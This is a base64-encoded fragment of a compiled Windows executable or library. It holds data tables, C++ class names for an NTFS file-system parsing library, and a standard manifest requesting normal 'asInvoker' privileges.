AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAACAgICAgICAgICAgICAgICAgICAgICAgICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoAAAAAAABBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////QwAAAGw0AYABAAAAcDQBgAEAAAB0NAGAAQAAAHg0AYABAAAAfDQBgAEAAACANAGAAQAAAIQ0AYABAAAAiDQBgAEAAACQNAGAAQAAAJg0AYABAAAAoDQBgAEAAACwNAGAAQAAALw0AYABAAAAyDQBgAEAAADUNAGAAQAAANg0AYABAAAA3DQBgAEAAADgNAGAAQAAAOQ0AYABAAAA6DQBgAEAAADsNAGAAQAAAPA0AYABAAAA9DQBgAEAAAD4NAGAAQAAAPw0AYABAAAAADUBgAEAAAAINQGAAQAAABA1AYABAAAAHDUBgAEAAAAkNQGAAQAAAOQ0AYABAAAALDUBgAEAAAA0NQGAAQAAADw1AYABAAAASDUBgAEAAABYNQGAAQAAAGA1AYABAAAAcDUBgAEAAAB8NQGAAQAAAIA1AYABAAAAiDUBgAEAAACYNQGAAQAAALA1AYABAAAAAQAAAAAAAADANQGAAQAAAMg1AYABAAAA0DUBgAEAAADYNQGAAQAAAOA1AYABAAAA6DUBgAEAAADwNQGAAQAAAPg1AYABAAAACDYBgAEAAAAYNgGAAQAAACg2AYABAAAAQDYBgAEAAABYNgGAAQAAAGg2AYABAAAAgDYBgAEAAACINgGAAQAAAJA2AYABAAAAmDYBgAEAAACgNgGAAQAAAKg2AYABAAAAsDYBgAEAAAC4NgGAAQAAAMA2AYABAAAAyDYBgAEAAADQNgGAAQAAANg2AYABAAAA4DYBgAEAAADwNgGAAQAAAAg3AYABAAAAGDcBgAEAAACgNgGAAQAAACg3AYABAAAAODcBgAEAAABINwGAAQAAAFg3AYABAAAAcDcBgAEAAACANwGAAQAAAJg3AYABAAAArDcBgAEAAAC0NwGAAQAAAMA3AYABAAAA2DcBgAEAAAAAOAGAAQAAABg4AYABAAAAIMkBgAEAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATMYBgAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMxgGAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzGAYABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATMYBgAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMxgGAAQAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDPAYABAAAAAAAAAAAAAAAAAAAAAAAAAMB6AYABAAAAUH8BgAEAAADQgAGAAQAAAFDGAYABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAP7/////////AAAAAMR8AYABAAAAcDsBgAEAAAB4OwGAAQAAAAEAAAAWAAAAAgAAAAIAAAADAAAAAgAAAAQAAAAYAAAABQAAAA0AAAAGAAAACQAAAAcAAAAMAAAACAAAAAwAAAAJAAAADAAAAAoAAAAHAAAACwAAAAgAAAAMAAAAFgAAAA0AAAAWAAAADwAAAAIAAAAQAAAADQAAABEAAAASAAAAEgAAAAIAAAAhAAAADQAAADUAAAACAAAAQQAAAA0AAABDAAAAAgAAAFAAAAARAAAAUgAAAA0AAABTAAAADQAAAFcAAAAWAAAAWQAAAAsAAABsAAAADQAAAG0AAAAgAAAAcAAAABwAAAByAAAACQAAAAYAAAAWAAAAgAAAAAoAAACBAAAACgAAAIIAAAAJAAAAgwAAABYAAACEAAAADQAAAJEAAAApAAAAngAAAA0AAAChAAAAAgAAAKQAAAALAAAApwAAAA0AAAC3AAAAEQAAAM4AAAACAAAA1wAAAAsAAAAYBwAADAAAAAwAAAAIAAAA//////////+ACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgnAYABAAAAAAAAAAAAAAAuP0FWYmFkX2V4Y2VwdGlvbkBzdGRAQAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC48wCAAQAAALjzAIABAAAAuPMAgAEAAAC48wCAAQAAALjzAIABAAAAuPMAgAEAAAC48wCAAQAAALjzAIABAAAAuPMAgAEAAAC48wCAAQAAAC4AAAAuAAAAMM8BgAEAAAAgzwGAAQAAAKzrAYABAAAArOsBgAEAAACs6wGAAQAAAKzrAYABAAAArOsBgAEAAACs6wGAAQAAAKzrAYABAAAArOsBgAEAAACs6wGAAQAAAH9/f39/f39/JM8BgAEAAACw6wGAAQAAALDrAYABAAAAsOsBgAEAAACw6wGAAQAAALDrAYABAAAAsOsBgAEAAACw6wGAAQAAAMB6AYABAAAAwnwBgAEAAAAAAAAAAAAAAADsAYABAAAAAAAAAAAAAAAA7AGAAQAAAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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YpCikOKRIpFikaKR4pIikmKSopLikyKTYpOik+KQIpRilKKU4pUilWKVopXiliKWYpailuKXIpdil6KX4pQimGKYopjimSKZYpmimeKaIppimqKa4psim2KbopvimCKcYpyinOKdIp1inaKd4p4inmKe4p8in2Kfop/inCKgYqCioOKhIqFioaKh4qIiomKioqLioyKjYqOio+KgIqRipKKk4qUipWKloqXipiKmYqaipuKnIqdip6Kn4qQiqGKooqjiqSKpYqmiqeKqIqpiqqKq4qsiq2KroqviqCKsYqyirOKtIq1iraKt4q4irmKuoq7iryKvYq+ir+KsIrBisKKw4rEisWKxorHisiKwAIAEAlAAAAPCl+KUApgimEKYYpiCmKKYwpjimQKZIplCmWKZgpmimcKZ4poCmiKaQppimoKaoprCmuKbApsim0KbYpuCm+KYApwinEKcYpyCnKKcwpzinQKdIp1CnWKdIqFCoWKioqLioyKjYqOio+KgIqRipKKk4qUipWKloqXipiKmYqaipuKnIqdip6Kn4qQiqADABABgAAAAQpBikIKQopMCsyKzQrNisAEABAPgAAACQqKCosKjAqNCo4KjwqACpEKkgqTCpQKlQqWCpcKmAqZCpoKmwqcCp0KngqfCpAKoQqiCqMKpAqlCqYKpwqoCqkKqgqrCqwKrQquCq8KoAqxCrIKswq0CrUKtgq3CrgKuQq6CrsKvAq9Cr4KvwqwCsEKwgrDCsQKxQrGCscKyArJCsoKywrMCs0KzgrPCsAK0QrSCtMK1ArVCtYK1wrYCtkK2grbCtwK3QreCt8K0ArhCuIK4wrkCuUK5grnCugK6QrqCusK7ArtCu4K7wrgCvEK8grzCvQK9Qr2CvcK+Ar5CvoK+wr8Cv0K/gr/CvAAAAUAEACAIAAACgEKAgoDCgQKBQoGCgcKCAoJCgoKCwoMCg0KDgoPCgAKEQoSChMKFAoVChYKFwoYChkKGgobChwKHQoeCh8KEAohCiIKIwokCiUKJgonCigKKQoqCisKLAotCi4KLwogCjEKMgozCjQKNQo2CjcKOAo5CjoKOwo8Cj0KPgo/CjAKQQpCCkMKRApFCkYKRwpICkkKSgpLCkwKTQpOCk8KQApRClIKUwpUClUKVgpXClgKWQpaClsKXApdCl4KXwpQCmEKYgpjCmQKZQpmCmcKaAppCmoKawpsCm2KbopvimCKcYpyinOKdIp1inaKd4p4inmKeop7inyKfYp+in+KcIqBioKKg4qEioWKhoqHioiKiYqKiouKjIqNio6Kj4qAipGKkoqTipSKlYqWipeKmIqZipqKm4qcip2KnoqfipCKoYqiiqOKpIqliqaKp4qoi